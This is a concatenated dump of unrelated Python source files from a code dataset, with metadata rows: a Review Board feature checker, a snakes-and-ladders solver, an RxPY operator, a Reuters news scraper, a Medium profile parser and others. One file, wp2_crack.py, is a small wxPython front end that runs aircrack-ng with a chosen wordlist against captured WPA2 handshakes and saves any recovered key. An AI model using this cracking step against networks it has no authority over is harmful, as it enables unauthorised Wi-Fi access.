# self.build_edit_matrix_for_types(
# node,
# edits,
# [tree.TYPE_AMENDMENT],
# [tree.TYPE_BILL_ARTICLE_REFERENCE],
# None
# )
return edits
def build_edit_matrix_for_types(self, node, edits, source_type, target_type, repo_types):
article_refs = []
sources = filter_nodes(
node,
lambda n: 'type' in n and n['type'] in source_type
)
for source in sources:
article_refs += filter_nodes(
source,
lambda n: 'type' in n and n['type'] in target_type
)
for article_ref in article_refs:
repo_refs = filter(
lambda n: 'type' in n and n['type'] in repo_types,
get_node_ancestors(article_ref)
)
if len(repo_refs) != 0:
key = (repo_refs[0]['id'], article_ref['id'])
if key not in edits:
edits[key] = []
edits[key].append(self.get_edit_source_nodes(article_ref))
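# Usage sketch (the attributes on args match what __init__ reads; visit() is
# assumed to be provided by duralex's AbstractVisitor base class):
#   visitor = CreateGitBookVisitor(args)  # args.gitbook, args.gitbook_format
#   visitor.visit(root_node)              # emits the GitBook when it reaches the root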
| agpl-3.0 | -7,017,960,253,196,176,000 | 38.856471 | 147 | 0.512368 | false | 3.950326 | false | false | false |
chipx86/reviewboard | reviewboard/features/checkers.py | 2 | 4416 | """Review Board feature checkers."""
from __future__ import unicode_literals
from django.conf import settings
from djblets.features.checkers import SiteConfigFeatureChecker
class RBFeatureChecker(SiteConfigFeatureChecker):
"""Feature checker that checks against a LocalSite's configuration.
Features can be enabled/disabled on a per-LocalSite basis by setting
the specified feature ID to either ``True`` or ``False`` in the
``enabled_features`` key in that LocalSite's
:py:attr:`~reviewboard.sites.models.LocalSite.extra_data`` field.
If the key is absent, this checker will check against the site
configuration (and then the Django settings) to see if it is enabled or
disabled globally.
"""
EXTRA_DATA_KEY = SiteConfigFeatureChecker.siteconfig_key
def is_feature_enabled(self, feature_id, **kwargs):
"""Return whether a feature is enabled for a given ID.
Features are strictly additive. That is, if a feature is enabled
globally (e.g., via
:py:class:`~djblets.siteconfig.models.SiteConfiguration` or via
:file:`settings_local.py`), disabling it for a
:py:class:`~reviewboard.site.models.LocalSite` will still result in the
feature being available (i.e., this function will return ``True``).
Args:
feature_id (unicode):
The unique identifier of the feature whose status is to be
determined.
**kwargs (dict):
Additional keyword arguments.
Keyword Args:
request (django.http.HttpRequest, optional):
An optional request. If this request is made against a
LocalSite, that LocalSite will be used to look up the feature.
Either this argument or ``local_site`` must be provided to
enable checking against a LocalSite.
If provided, it will be used to cache the results of the
:py:class:`~reviewboard.site.models.LocalSite` lookup.
local_site (reviewboard.site.models.LocalSite, optional):
An optional local site. If provided, this LocalSite will be
used to look up the status of the requested feature.
Either this argument or ``request`` must be provided to enable
checking against a LocalSite.
force_check_user_local_sites (bool, optional):
Force checking the Local Sites that the user is a member of.
This is only used for unit tests, and disables some
optimizations intended to stabilize query counts.
Returns:
bool:
Whether or not the feature is enabled.
"""
local_site = kwargs.get('local_site')
request = kwargs.get('request')
force_check_user_local_sites = \
kwargs.get('force_check_user_local_sites', False)
local_sites = []
if local_site:
local_sites.append(local_site)
elif request is not None:
try:
local_sites = request._user_local_sites_cache
except AttributeError:
if getattr(request, 'local_site', None):
local_sites.append(request.local_site)
# Note that if we're running unit tests, we don't really want
# to bother checking other Local Site associations. They're not
# going to come into play unless we're testing this logic
# itself, and the generated number of queries becomes too
# unpredictable whenever we introduce new features that aren't
# enabled by default.
if (request.user.is_authenticated() and
(force_check_user_local_sites or
not getattr(settings, 'RUNNING_TEST', False))):
local_sites.extend(request.user.local_site.all())
request._user_local_sites_cache = local_sites
for local_site in local_sites:
if (local_site.extra_data and
local_site.extra_data.get(self.EXTRA_DATA_KEY,
{}).get(feature_id)):
return True
return super(RBFeatureChecker, self).is_feature_enabled(feature_id,
**kwargs)
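# Example (sketch): enabling a feature for a single LocalSite. The feature ID
# is a hypothetical placeholder; the extra_data layout is the one read above.
#   features = local_site.extra_data.setdefault(
#       RBFeatureChecker.EXTRA_DATA_KEY, {})
#   features['my.feature.id'] = True
#   local_site.save()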
| mit | -9,158,350,635,790,341,000 | 40.660377 | 79 | 0.603261 | false | 4.768898 | true | false | false |
lemming52/white_pawn | hackerrank/snakesladders/solution.py | 1 | 3998 | """
Markov takes out his Snakes and Ladders game, stares at the board and wonders: "If I can always roll the die to whatever number I want, what would be the least number of rolls to reach the destination?"
Rules: The game is played with a cubic die of 6 faces numbered 1 to 6.
Starting from square 1, land on square 100 with the exact roll of the die. If moving the number rolled would place the player beyond square 100, no move is made.
If a player lands at the base of a ladder, the player must climb the ladder. Ladders go up only.
If a player lands at the mouth of a snake, the player must go down the snake and come out through the tail. Snakes go down only.
Function Description
Complete the quickestWayUp function in the editor below. It should return an integer that represents the minimum number of moves required.
quickestWayUp has the following parameter(s):
ladders: a 2D integer array where each contains the start and end cell numbers of a ladder
snakes: a 2D integer array where each contains the start and end cell numbers of a snake
Input Format
The first line contains the number of tests, t.
For each testcase:
- The first line contains n, the number of ladders.
- Each of the next n lines contains two space-separated integers, the start and end cells of a ladder.
- The next line contains the integer m, the number of snakes.
- Each of the next m lines contains two space-separated integers, the start and end cells of a snake.
Constraints
The board is always 10x10 with squares numbered 1 to 100.
Neither square 1 nor square 100 will be the starting point of a ladder or snake.
A square will have at most one endpoint from either a snake or a ladder.
Output Format
For each of the t test cases, print the least number of rolls to move from start to finish on a separate line. If there is no solution, print -1.
Sample Input
2
3
32 62
42 68
12 98
7
95 13
97 25
93 37
79 27
75 19
49 47
67 17
4
8 52
6 80
26 42
2 72
9
51 19
39 11
37 29
81 3
59 5
79 23
53 7
43 33
77 21
Sample Output
3
5
"""
#!/bin/python3
import math
import os
import random
import re
import sys
from collections import defaultdict, deque
class Graph:
def __init__(self):
self.neighbours=defaultdict(list)
def add_edge(self,u,v,dist):
if dist >= 0:
self.neighbours[u].append([v, dist])
else:
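            # negative dist marks a forced snake/ladder jump: it replaces every
            # die edge out of u with a single zero-cost move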
self.neighbours[u] = [[v, 0]]
    def add_node(self, a):
        # neighbours is a defaultdict, so this just ensures the key exists
        self.neighbours.setdefault(a, [])
    def shortest_path(self):
        # 0-1 BFS: die rolls cost 1, forced snake/ladder jumps cost 0, so
        # zero-cost moves go to the front of the deque to keep it ordered
        queue = deque()
        visited = {}
        queue.append((0, 0))
        while queue:
            index, rolls = queue.popleft()
            if index in visited:
                continue
            visited[index] = rolls
            if index == 99:
                break
            for neighbour, dist in self.neighbours[index]:
                if neighbour not in visited:
                    if dist == 0:
                        queue.appendleft((neighbour, rolls))
                    else:
                        queue.append((neighbour, rolls + dist))
        if 99 in visited:
            return visited[99]
        else:
            return -1
# Complete the quickestWayUp function below.
def quickestWayUp(ladders, snakes):
g = Graph()
    for i in range(99):
        for j in range(1, 7):
            if i + j <= 99:  # an exact roll is required; overshooting is no move
                g.add_edge(i, i + j, 1)
    for ladder in ladders:
        g.add_edge(ladder[0]-1, ladder[1]-1, -1)  # forced move: see add_edge
    for snake in snakes:
        g.add_edge(snake[0]-1, snake[1]-1, -1)
return g.shortest_path()
if __name__ == '__main__':
fptr = sys.stdout
t = int(input())
for t_itr in range(t):
n = int(input())
ladders = []
for _ in range(n):
ladders.append(list(map(int, input().rstrip().split())))
m = int(input())
snakes = []
for _ in range(m):
snakes.append(list(map(int, input().rstrip().split())))
result = quickestWayUp(ladders, snakes)
fptr.write(str(result) + '\n')
fptr.close()
| mit | 7,320,411,094,006,963,000 | 22.230303 | 202 | 0.615808 | false | 3.485615 | false | false | false |
SilverBlogTeam/SilverBlog | upgrade/upgrade_from_1.py | 1 | 1367 | if __name__ == '__main__':
print("The upgrade script has changed. You need to execute the upgrade command again to update the data structure.")
exit(0)
import json
import os
import shutil
from common import file
def change_time_format(list_item):
import time
system_info = json.loads(file.read_file("./config/system.json"))
if "time" in list_item and isinstance(list_item["time"], str):
list_item["time"] = time.mktime(time.strptime(list_item["time"], system_info["Time_Format"]))
return list_item
def main():
if not os.path.exists("./backup"):
os.mkdir("./backup")
shutil.copytree("./config", "./backup/config")
shutil.copytree("./document", "./backup/document")
if os.path.exists("./templates/static/user_file"):
shutil.copytree("./templates/static/user_file", "./backup/static/user_file")
write_json = json.loads(file.read_file("./config/page.json"))
    write_json = list(map(change_time_format, write_json))
file.write_file("./config/page.json", file.json_format_dump(write_json))
for filename in os.listdir("./document/"):
if filename.endswith(".json"):
write_json = json.loads(file.read_file("./document/" + filename))
            write_json = change_time_format(write_json)
            file.write_file("./document/" + filename, file.json_format_dump(write_json)) | bsd-3-clause | 6,423,764,364,611,883,000 | 39.235294 | 120 | 0.653987 | false | 3.645333 | false | false | false
EthanAdner/Picture | picture.py | 1 | 1865 | """
picture.py
Author: Ethan Adner
Credit: Hex color codes
Assignment:
Use the ggame library to "paint" a graphical picture of something (e.g. a house, a face or landscape).
Use at least:
1. Three different Color objects.
2. Ten different Sprite objects.
3. One (or more) RectangleAsset objects.
4. One (or more) CircleAsset objects.
5. One (or more) EllipseAsset objects.
6. One (or more) PolygonAsset objects.
See:
https://github.com/HHS-IntroProgramming/Standards-and-Syllabus/wiki/Displaying-Graphics
for general information on how to use ggame.
See:
http://brythonserver.github.io/ggame/
for detailed information on ggame.
"""
from ggame import App, Color, LineStyle, Sprite, RectangleAsset, CircleAsset, EllipseAsset, PolygonAsset
# add your code here \/ \/ \/
red = Color(0xff0000, 1.0)
green = Color(0x00ff00, 1.0)
blue = Color(0x0000ff, 1.0)
black = Color(0x000000, 1.0)
orange = Color(0xff7400, 1.0)
beige = Color(0xffffd8, 1.0)
white = Color(0xffffff, 1.0)
noline = LineStyle(2 , black)
nlu = LineStyle(5 , blue)
thickline = LineStyle(5 , red)
thickline2 = LineStyle(5, orange)
circle = CircleAsset(10, noline, beige)
poly = PolygonAsset([(20,20), (30,40), (50,160), (20,100)], thickline, red)
portal1 = EllipseAsset(40, 10, nlu, white)
rectum = RectangleAsset(40, 60, thickline2, orange)
portal2 = EllipseAsset(40, 10, thickline2, white)
rectum2 = RectangleAsset(40, 30, thickline2, orange)
legs = RectangleAsset(5, 30, thickline2, orange)
#arm1 =
#arm2 =
arm1 = Sprite(legs, (130, 480))
arm2 = Sprite(legs, (30, 480))
arm1.rotation=-1
arm2.rotation=1
#arm1.roation=.5
Sprite(circle, (80, 478))
Sprite(poly, (90, 530))
Sprite(portal1, (80, 150))
Sprite(portal2, (80, 550))
Sprite(rectum, (60, 490))
Sprite(rectum2, (60, 150))
Sprite(legs, (60, 180))
Sprite(legs, (95, 180))
# add your code here /\ /\ /\
myapp = App()
myapp.run()
| mit | 2,853,899,190,494,927,000 | 23.866667 | 104 | 0.710456 | false | 2.590278 | false | false | false |
fre-sch/collector-drone | collectordrone/errors.py | 1 | 1289 | # Unofficial companion web-app for Elite: Dangerous (property of Frontier
# Developments). Collector-Drone lets you manage blueprints and material
# inventory for crafting engineer upgrades.
# Copyright (C) 2016 Frederik Schumacher
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
class ServiceError(Exception):
status_code = 400
def __init__(self, message, status_code=None, **payload):
super(ServiceError, self).__init__()
self.message = message
if status_code is not None:
self.status_code = status_code
self.payload = payload
def to_dict(self):
rv = dict(self.payload or ())
rv['message'] = self.message
return rv
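# Example (sketch): raising and serializing a ServiceError, e.g. from a web
# framework error handler (the payload keys are arbitrary illustrations):
#   err = ServiceError("blueprint not found", status_code=404, blueprint_id=42)
#   err.to_dict()  # -> {'blueprint_id': 42, 'message': 'blueprint not found'}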
| gpl-3.0 | -6,516,625,199,229,902,000 | 39.28125 | 73 | 0.71218 | false | 3.990712 | false | false | false |
liorvh/infernal-twin | wp2_crack.py | 9 | 5176 | import wx
import os, sys
class MyFrame(wx.Frame):
def __init__(self, parent, id, title):
wx.Frame.__init__(self, parent, id, title)
panel = wx.Panel(self,-1)
wx.StaticText(panel, -1, 'See Logs for results\ncaptures/key_found.txt', (45, 25), style=wx.ALIGN_CENTRE)
self.CreateStatusBar()
menuBar = wx.MenuBar()
menu = wx.Menu()
menu.Append(99, "&WPA2 Cracker", "Crack WPA/WPA2 handshakes")
#~ menu.Append(100, "&NTLM Cracker", "Crack NTLM Hashes")
#~ menu.Append(101, "&File Dialog", "Shows a File Dialog")
#~ menu.Append(102, "&Page Setup Dialog", "Shows a Page Setup Dialog")
#~ menu.Append(103, "&Font Dialog", "Shows a Font Dialog")
#~ menu.Append(104, "&Directory Dialog", "Shows a Directory Dialog")
#~ menu.Append(105, "&SingleChoice Dialog", "Shows a SingleChoice Dialog")
#~ menu.Append(106, "&TextEntry Dialog", "Shows a TextEntry Dialog")
menuBar.Append(menu, "&Cracker")
self.SetMenuBar(menuBar)
self.Bind(wx.EVT_MENU, self.openfile, id=99)
#dlg.Destroy()
#~ def results_output(self, e):
#~ with open('captures/key_found.txt') as f:
#~ for i in f:
#~
#~ if i == "":
#~
#~ wx.StaticText(panel, -1, "Key is not found: ", (45, 25), style=wx.ALIGN_CENTRE)
#~ self.Centre()
#~ else:
#~ wx.StaticText(panel, -1, "Key is found: " + str(i), (45, 25), style=wx.ALIGN_CENTRE)
#~ self.Centre()
#~ self.Bind(wx.EVT_MENU, self.choosecolor, id=100)
#~ self.Bind(wx.EVT_MENU, self.openfile, id=101)
#~ self.Bind(wx.EVT_MENU, self.pagesetup, id=102)
#~ self.Bind(wx.EVT_MENU, self.choosefont, id=103)
#~ self.Bind(wx.EVT_MENU, self.opendir, id=104)
#~ self.Bind(wx.EVT_MENU, self.singlechoice, id=105)
#~ self.Bind(wx.EVT_MENU, self.textentry, id=106)
#~ def message(self, event):
#~ dlg = wx.MessageDialog(self, 'To save one life is as if you have saved the world.', 'Talmud', wx.OK|wx.ICON_INFORMATION)
#~ dlg.ShowModal()
#~ dlg.Destroy()
#~ def choosecolor(self, event):
#~ dlg = wx.ColourDialog(self)
#~ dlg.GetColourData().SetChooseFull(True)
#~ if dlg.ShowModal() == wx.ID_OK:
#~ data = dlg.GetColourData()
#~ self.SetStatusText('You selected: %s\n' % str(data.GetColour().Get()))
#~ dlg.Destroy()
def openfile(self, event):
dlg = wx.FileDialog(self, "Choose a file", os.getcwd(), "", "*.*", wx.OPEN)
if dlg.ShowModal() == wx.ID_OK:
path = dlg.GetPath()
mypath = os.path.basename(path)
self.SetStatusText("You selected: %s" % mypath)
os.system("gnome-terminal -x aircrack-ng -w "+str(path)+" captures/*.cap -l captures/key_found.txt")
dlg.Destroy()
#~ def pagesetup(self, event):
#~ dlg = wx.PageSetupDialog(self)
#~ if dlg.ShowModal() == wx.ID_OK:
#~ data = dlg.GetPageSetupData()
#~ tl = data.GetMarginTopLeft()
#~ br = data.GetMarginBottomRight()
#~ self.SetStatusText('Margins are: %s %s' % (str(tl), str(br)))
#~ dlg.Destroy()
#~ def choosefont(self, event):
#~ default_font = wx.Font(10, wx.SWISS , wx.NORMAL, wx.NORMAL, False, "Verdana")
#~ data = wx.FontData()
#~ if sys.platform == 'win32':
#~ data.EnableEffects(True)
#~ data.SetAllowSymbols(False)
#~ data.SetInitialFont(default_font)
#~ data.SetRange(10, 30)
#~ dlg = wx.FontDialog(self, data)
#~ if dlg.ShowModal() == wx.ID_OK:
#~ data = dlg.GetFontData()
#~ font = data.GetChosenFont()
#~ color = data.GetColour()
#~ text = 'Face: %s, Size: %d, Color: %s' % (font.GetFaceName(), font.GetPointSize(), color.Get())
#~ self.SetStatusText(text)
#~ dlg.Destroy()
#~
#~ def opendir(self, event):
#~ dlg = wx.DirDialog(self, "Choose a directory:", style=wx.DD_DEFAULT_STYLE | wx.DD_NEW_DIR_BUTTON)
#~ if dlg.ShowModal() == wx.ID_OK:
#~ self.SetStatusText('You selected: %s\n' % dlg.GetPath())
#~ dlg.Destroy()
#~
#~ def singlechoice(self, event):
#~ sins = ['Greed', 'Lust', 'Gluttony', 'Pride', 'Sloth', 'Envy', 'Wrath']
#~ dlg = wx.SingleChoiceDialog(self, 'Seven deadly sins', 'Which one?', sins, wx.CHOICEDLG_STYLE)
#~ if dlg.ShowModal() == wx.ID_OK:
#~ self.SetStatusText('You chose: %s\n' % dlg.GetStringSelection())
#~ dlg.Destroy()
#~
#~ def textentry(self, event):
#~ dlg = wx.TextEntryDialog(self, 'Enter some text','Text Entry')
#~ dlg.SetValue("Default")
#~ if dlg.ShowModal() == wx.ID_OK:
#~ self.SetStatusText('You entered: %s\n' % dlg.GetValue())
#~ dlg.Destroy()
class MyApp(wx.App):
def OnInit(self):
myframe = MyFrame(None, -1, "Cracker")
myframe.CenterOnScreen()
myframe.Show(True)
return True
#~
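# Usage sketch: run "python wp2_crack.py" (needs wxPython 2.x and aircrack-ng
# on PATH). The Cracker menu opens a wordlist picker, then shells out to
# aircrack-ng against captures/*.cap and logs any key to captures/key_found.txt.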
| gpl-3.0 | 3,435,153,990,718,865,400 | 38.212121 | 131 | 0.553323 | false | 3.210918 | false | false | false |
hzdg/django-ecstatic | setup.py | 1 | 1619 | #/usr/bin/env python
import codecs
import os
from setuptools import setup, find_packages
read = lambda filepath: codecs.open(filepath, 'r', 'utf-8').read()
def exec_file(filepath, globalz=None, localz=None):
exec(read(filepath), globalz, localz)
# Load package meta from the pkgmeta module without loading the package.
pkgmeta = {}
exec_file(os.path.join(os.path.dirname(__file__), 'ecstatic', 'pkgmeta.py'),
pkgmeta)
setup(
name=pkgmeta['__title__'],
version=pkgmeta['__version__'],
description='An expansion pack for django.contrib.staticfiles!',
long_description=read(os.path.join(os.path.dirname(__file__), 'README.rst')),
author=pkgmeta['__author__'],
author_email='[email protected]',
url='http://github.com/hzdg/django-ecstatic',
download_url='http://github.com/hzdg/django-ecstatic/tarball/master',
packages=find_packages(),
zip_safe=False,
include_package_data=True,
tests_require=[
],
install_requires=[
'Django>=1.4',
'django-appconf>=0.5',
],
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2.5',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Topic :: Utilities'
],
)
| mit | 959,482,487,382,134,500 | 31.38 | 81 | 0.627548 | false | 3.730415 | false | false | false |
dbrattli/RxPY | rx/linq/observable/selectmany.py | 1 | 2647 | from rx import Observable
from rx.internal.utils import adapt_call
from rx.internal import extensionmethod
import collections
def _flat_map(source, selector):
def projection(x, i):
selector_result = selector(x, i)
if isinstance(selector_result, collections.Iterable):
result = Observable.from_(selector_result)
else:
result = Observable.from_future(selector_result)
return result
return source.map(projection).merge_observable()
@extensionmethod(Observable, alias="flat_map")
def select_many(self, selector, result_selector=None):
"""One of the Following:
Projects each element of an observable sequence to an observable
sequence and merges the resulting observable sequences into one
observable sequence.
1 - source.select_many(lambda x: Observable.range(0, x))
Or:
Projects each element of an observable sequence to an observable
sequence, invokes the result selector for the source element and each
of the corresponding inner sequence's elements, and merges the results
into one observable sequence.
1 - source.select_many(lambda x: Observable.range(0, x), lambda x, y: x + y)
Or:
Projects each element of the source observable sequence to the other
observable sequence and merges the resulting observable sequences into
one observable sequence.
1 - source.select_many(Observable.from_([1,2,3]))
Keyword arguments:
selector -- A transform function to apply to each element or an
observable sequence to project each element from the source
sequence onto.
result_selector -- [Optional] A transform function to apply to each
element of the intermediate sequence.
Returns an observable sequence whose elements are the result of
invoking the one-to-many transform function collectionSelector on each
element of the input sequence and then mapping each of those sequence
elements and their corresponding source element to a result element.
"""
if result_selector:
def projection(x, i):
selector_result = selector(x, i)
if isinstance(selector_result, collections.Iterable):
result = Observable.from_(selector_result)
else:
result = Observable.from_future(selector_result)
return result.map(lambda y: result_selector(x, y, i))
return self.flat_map(projection)
if callable(selector):
selector = adapt_call(selector)
ret = _flat_map(self, selector)
else:
ret = _flat_map(self, lambda _,__: selector)
return ret
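# Example (sketch; Python 3 print function assumed, and the relative order in
# which the merged inner sequences interleave is not guaranteed):
#   Observable.range(1, 3).select_many(
#       lambda x, i: Observable.range(0, x)
#   ).subscribe(print)  # emits 0, 0, 1, 0, 1, 2 in some interleaving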
| apache-2.0 | -875,346,721,671,318,700 | 35.763889 | 80 | 0.69286 | false | 4.471284 | false | false | false |
divir94/News-Analytics | Divir/Scraping/scrape_articles.py | 1 | 10543 | # -*- coding: utf8 -*-
# scraping
import urllib2
from goose import Goose
from bs4 import BeautifulSoup
# db
import shelve
# time/timeout
import signal
from datetime import *
from contextlib import contextmanager
from time import time
# others
import itertools
import sys
from pprint import pprint
from collections import OrderedDict
"""
articles_dict
key: date (yyyymmdd) i.e. 20070701
value: dict with key: val -> url: (title, text)
"""
""" ------------- Generic Scraping ---------------"""
# html
def get_html(url):
""""given a url returns html"""
try:
html = urllib2.urlopen(url).read()
return html
except urllib2.HTTPError, e:
print "URL broke: %s" % url
return None
# tags
def find_tags(html, tag_name, class_name=False, a_tag=False):
""""find tags using beautifulsoup,
options: use a class name, get anchor tags"""
soup = BeautifulSoup(html)
# get tag with class if specified
if class_name: tags = soup.findAll(tag_name, { "class" : class_name })
else: tags = soup.findAll(tag_name)
# get anchor tag if specified
if a_tag: tags = [link.find("a")["href"] for link in tags]
return tags
# article
def get_article(url):
"""get article title and text using goose"""
g = Goose()
article = g.extract(url=url)
title = article.title
text = article.cleaned_text
return (title, text)
class TimeoutException(Exception): pass
def timeout(fun, limit, *args ):
@contextmanager
def time_limit(seconds):
def signal_handler(signum, frame):
raise TimeoutException, "Timed out!"
signal.signal(signal.SIGALRM, signal_handler)
signal.alarm(seconds)
try: yield
finally: signal.alarm(0)
try:
with time_limit(limit):
return fun(*args)
except TimeoutException, msg:
print "Function timed out\n"
return ("", "")
""" ----------------- Helper ------------------"""
def dates_in_range(start_date, end_date):
    """ Returns list of calendar dates in interval"""
diff = end_date - start_date
dates = [ start_date + timedelta(i) for i in range(diff.days + 1) ]
return dates
# for date in dates_in_range(date(2014,6,15), date(2014,7,15)): print date
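def article_links_on_date(date):
    """Shim for the legacy helper referenced by the reporting functions below.
    Assumption: it simply wrapped the per-date link listing that now lives on
    ArticleScraper (defined further down; the name is resolved at call time)."""
    return ArticleScraper(date, print_details=False).get_article_links()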
def store_num_articles(start_date, end_date):
dates = dates_in_range(start_date, end_date)
num_dates = len(dates)
total_articles = 0
temp_dict = dict()
# 1
main_dict = shelve.open("../Data/num_articles")
dates_stored = [date for date in main_dict]
main_dict.close()
for i in range(num_dates):
date = str(dates[i])
if date in dates_stored:
print "Date: %s in dict" % date
continue
try:
articles_list = timeout(article_links_on_date, 5, date)
if isinstance(articles_list, list):
num_articles = len(articles_list)
total_articles += num_articles
temp_dict[str(date)] = num_articles
print "Date: %s, Num articles: %s" % ( date, num_articles )
except: "\nFailed to get articles list on date %s\n" % date
# write to dict
if i%20 == 0:
main_dict = shelve.open("../Data/num_articles")
main_dict.update(temp_dict)
main_dict.close()
temp_dict = dict()
print "\nSuccessfully updated dict, date: %s\n" % ( date )
print "\nTotal articles: %s" % total_articles
def print_num_articles():
d = shelve.open("../Data/num_articles")
total_articles = 0
missing_dates = []
    calendar_dates = dates_in_range( date(2007,1,1), date(2014,7,26) )
    ordered_dict = OrderedDict(sorted(d.iteritems()))
# print ordered dates in dict
for my_date, num_articles in ordered_dict.items():
total_articles += num_articles
print "Date: %s, Num articles: %s" % ( my_date, num_articles )
print "\nNum dates on calender: %d" % len(calender_dates)
print "Num dates stored: %d" % len(ordered_dict)
print "Total articles: %d" % total_articles
# print and get missing dates
print "\nMissing dates:"
    for my_date in calendar_dates:
if str(my_date) not in d:
print my_date
d[str(my_date)] = len(article_links_on_date(my_date))
d.close()
# print_num_articles()
""" --------------- Scraper Class ---------------"""
class ArticleScraper():
def __init__(self, date, print_details=True):
self.date = date
self.date_str = str(date)
self.path_to_data = "../Data/Articles/"
self.reuters_article_links = [] # total articles on reuters
self.corrupted_keys = [] # failed to read key from db
self.pre_stored_links = [] # already stored in db and title not empty
self.stored_links = [] # stored in current process
self.crashed_links = [] # DB or Goose crashed while extracting
self.empty_links = [] # Goose returned w/ empty title
self.empty_db_links = []
self.print_details = print_details
def get_article_links(self):
"""
:return: List of article urls for a given date
"""
reuters_date_format = self.date_str.replace("-","")
url = "http://www.reuters.com/resources/archive/us/%s.html" % reuters_date_format
html = get_html(url)
# all links includes articles + video
all_links = find_tags(html, 'div', 'headlineMed', a_tag=True)
# remove video links
self.reuters_article_links = [link for link in all_links if 'video' not in str(link)]
return self.reuters_article_links
def get_pre_stored_links(self, details=False):
"""
:return: List of stored articles for a given date
"""
main_db = shelve.open(self.path_to_data + self.date_str, 'r')
for link in main_db:
try:
title, text = main_db[link]
if title and text:
self.log_link(link, "prestored-log", title, details)
else:
self.log_link(link, "empty-db", title)
except:
self.log_link(link, "corrupted-key")
main_db.close()
return self.pre_stored_links
def store_article(self, link, temp_dict):
"""
:param temp_dict: temp dict to update main db
:return: Store and log article
"""
try: title, text = timeout(get_article, 5, link)
except:
self.log_link(link, "crashed")
return
if title:
temp_dict[link] = ( title, text )
self.log_link(link, "stored", title)
else: self.log_link(link, "empty")
def log_link(self, link, status, title="", details=True):
"""
:return: Store links in resp dict and print if asked
"""
if self.print_details and details: print "Status: %s, %s, %s" % (status, link, title)
if status == "crashed":
self.crashed_links.append(link)
elif status == "empty":
self.empty_links.append(link)
elif status == "stored":
self.stored_links.append(link)
elif status == "prestored-log":
self.pre_stored_links.append(link)
elif status == "pprestored-nolog": pass
elif status == "corrupted-key":
self.corrupted_keys.append(link)
elif status == "empty-db":
self.empty_db_links.append(link)
def update_main_db(self, temp_dict):
"""
:return: Update main db with temp dict to prevent corruption of db
"""
main_db = shelve.open(self.path_to_data + self.date_str, 'c')
main_db.update(temp_dict)
main_db.close()
def print_read_results(self):
"""
:return: Print results after reading db
"""
if self.print_details:
print "\n\nCorrupted keys:"
for link in self.corrupted_keys: print link
print "\n\nEmpty db links:"
for link in self.empty_db_links: print link
print "\nReuter's: %d" % len(self.get_article_links())
print "Pre-stored: %d" % len(self.pre_stored_links)
print "Empty: %d" % len(self.empty_db_links)
print "Corrupted keys: %d" % len(self.corrupted_keys)
def print_store_results(self):
"""
:return: Print results after updating db
"""
if self.print_details:
print "\nEmpty articles:"
for link in self.empty_links: print link
print "\nCrashed articles:"
for link in self.crashed_links: print link
print "\nReuter's: %d" % len(self.reuters_article_links)
print "Stored: %d" % len(self.stored_links)
print "Crashed: %d" % len(self.crashed_links)
print "Empty: %d" % len(self.empty_links)
def test_link(self, link):
title, text = get_article(link)
print title
print text
def run_read(self):
"""
:return: Print articles in db
"""
print "\n\nDate: %s" % self.date_str
self.get_pre_stored_links(details=True)
self.print_read_results()
def run_store(self):
"""
:return: Update main db with temp dict to prevent corruption of db
"""
print "Date: %s" % self.date_str
start_time = time()
temp_dict = dict()
article_links = self.get_article_links()
num_articles = len(article_links)
pre_stored_articles = self.get_pre_stored_links()
# store, log and update main db
for i in range(num_articles):
link = article_links[i]
# check if already stored
if link in pre_stored_articles:
self.log_link(link, "prestored-nolog")
continue
# store and log
self.store_article(link, temp_dict)
# open and update main db, clear temp dict
if i%20 == 0:
self.update_main_db(temp_dict)
if self.print_details: print "\nSuccessfully updated dict, i: %d, num links: %d\n" % ( i, num_articles)
# print results
self.print_store_results()
print "Time taken: %s sec" % str(time() - start_time)
""" ------------- Main ---------------"""
for i in range(3,4):
my_date = date(2014,7,i)
scraper = ArticleScraper(my_date, False)
scraper.run_read() | apache-2.0 | 1,659,297,324,422,557,700 | 31.244648 | 119 | 0.572987 | false | 3.656955 | false | false | false |
lifei96/Medium_Crawler | User_Crawler/util_parser.py | 2 | 2683 | # -*- coding: utf-8 -*-
import json
def user_parser(file_path):
with open(file_path, 'r') as f:
raw_data = json.load(f)
data = dict()
data['username'] = raw_data['profile']['user']['username']
if 'socialStats' in raw_data['profile']['user']:
data['followers'] = raw_data['profile']['user']['socialStats']['usersFollowedByCount']
data['following'] = raw_data['profile']['user']['socialStats']['usersFollowedCount']
else:
data['followers'] = len(raw_data['followers'])
data['following'] = len(raw_data['following'])
data['lastPostCreatedAt'] = raw_data['profile']['user']['lastPostCreatedAt']
data['createdAt'] = raw_data['profile']['user']['createdAt']
data['postsInMonthlyTop100'] = raw_data['profile']['postsInMonthlyTop100']
if 'twitterScreenName' not in raw_data['profile']['user'] or raw_data['profile']['user']['twitterScreenName'] == '':
data['twitter'] = 0
else:
data['twitter'] = 1
if 'facebookAccountId' not in raw_data['profile']['user'] or raw_data['profile']['user']['facebookAccountId'] == '':
data['facebook'] = 0
else:
data['facebook'] = 1
if raw_data['profile']['user']['bio'] == '':
data['bio'] = 0
else:
data['bio'] = 1
data['posts'] = len(raw_data['latest'])
data['highlights'] = len(raw_data['highlights'])
data['responses'] = len(raw_data['responses'])
data['recommends'] = len(raw_data['recommends'])
data['authorTags'] = len(raw_data['profile']['authorTags'])
data['collections'] = len(raw_data['profile']['collections'])
data['topAuthorTags'] = len(raw_data['profile']['topAuthorTags'])
data['interestTags'] = len(raw_data['profile']['interestTags'])
return data
def twitter_parser(file_path):
data = dict()
data['twitter_followers'] = ''
data['twitter_friends'] = ''
data['twitter_listed'] = ''
data['twitter_statuses'] = ''
data['twitter_favourites'] = ''
data['twitter_description'] = ''
if file_path == '':
return data
with open(file_path, 'r') as f:
raw_data = json.load(f)
if 'profile_user' in raw_data:
raw_data = raw_data['profile_user']
else:
return data
data['twitter_followers'] = raw_data['followers_count']
data['twitter_friends'] = raw_data['friends_count']
